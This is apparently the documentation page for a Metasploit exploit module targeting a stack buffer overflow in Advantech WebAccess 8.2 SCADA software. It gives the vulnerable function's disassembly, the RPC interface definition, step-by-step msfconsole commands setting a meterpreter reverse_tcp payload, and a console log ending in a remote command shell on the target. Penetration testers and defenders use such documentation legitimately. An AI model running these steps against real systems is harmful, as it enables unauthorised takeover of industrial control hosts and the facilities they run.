metasploit-gs/documentation/modules/exploit/windows/scada/advantech_webaccess_webvrpcs_bof.md

Vulnerable Application

Advantech WebAccess <= 8.2

Vulnerability Analysis

The stack overflow happens in sub_10004BC8:

.text:10004BC8 ; int __cdecl sub_10004BC8(char *Format, char)
.text:10004BC8 sub_10004BC8    proc near               ; 
.text:10004BC8                                         ;
.text:10004BC8
.text:10004BC8 lpWindowName    = dword ptr -818h
.text:10004BC8 hWnd            = dword ptr -814h
.text:10004BC8 lpClassName     = dword ptr -810h
.text:10004BC8 Args            = dword ptr -80Ch
.text:10004BC8 lpBaseAddress   = dword ptr -808h
.text:10004BC8 hFileMappingObject= dword ptr -804h
.text:10004BC8 Dest            = byte ptr -800h
.text:10004BC8 Format          = dword ptr  8
.text:10004BC8 arg_4           = byte ptr  0Ch
.text:10004BC8
.text:10004BC8                 push    ebp
.text:10004BC9                 mov     ebp, esp
.text:10004BCB                 sub     esp, 818h
.text:10004BD1                 mov     [ebp+lpWindowName], offset aDebugScreen1    ; "Debug Screen1"
.text:10004BDB                 mov     [ebp+lpClassName], offset aDebugwclass1     ; "debugWClass1"
.text:10004BE5                 lea     eax, [ebp+arg_4]
.text:10004BE8                 mov     [ebp+Args], eax
.text:10004BEE                 mov     ecx, [ebp+Args]
.text:10004BF4                 push    ecx                                         ; Args
.text:10004BF5                 mov     edx, [ebp+Format]
.text:10004BF8                 push    edx                                         ; Format
.text:10004BF9                 lea     eax, [ebp+Dest]
.text:10004BFF                 push    eax                                         ; Dest
.text:10004C00                 call    ds:vsprintf                                 ; overflow

The corresponding IDL is below:

[
 uuid(5d2b62aa-ee0a-4a95-91ae-b064fdb471fc),
 version(1.0)
]

interface target_interface
{

/* opcode: 0x01, address: 0x00401260 */

void sub_401260 (
 [in] handle_t  arg_1,
 [in] long  arg_2,
 [in] long  arg_3,
 [in] long  arg_4,
 [in][ref][size_is(arg_4)] char * arg_5,
 [out][ref] long * arg_6
);

}

Verification Steps

1. Start msfconsole
2. use exploits/windows/scada/advantech_webaccess_webvrpcs_bof
3. set payload windows/meterpreter/reverse_tcp
4. set LHOST XXX.XXX.XXX.XXX
5. exploit
6. Verify you get a connect back meterpreter

Options

None.

Scenarios

saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/advantech.rc 
[*] Processing scripts/advantech.rc for ERB directives.
resource (scripts/advantech.rc)> use exploit/windows/scada/advantech_webaccess_webvrpcs_bof
resource (scripts/advantech.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (scripts/advantech.rc)> set RHOST 172.16.175.136
RHOST => 172.16.175.136
resource (scripts/advantech.rc)> set LHOST 172.16.175.1
LHOST => 172.16.175.1
resource (scripts/advantech.rc)> exploit
[*] Started reverse TCP handler on 172.16.175.1:4444 
[*] 172.16.175.136:4592 - Binding to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...
[*] 172.16.175.136:4592 - Bound to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...
[+] 172.16.175.136:4592 - Got a handle: 0x01ef2558
[*] 172.16.175.136:4592 - Trying target Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31...
[*] Sending stage (179779 bytes) to 172.16.175.136
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.136:49206) at 2017-12-11 11:32:15 -0600
[*] 172.16.175.136:4592 - The DCERPC service did not reply to our request

meterpreter > shell
Process 5208 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\WebAccess\Node>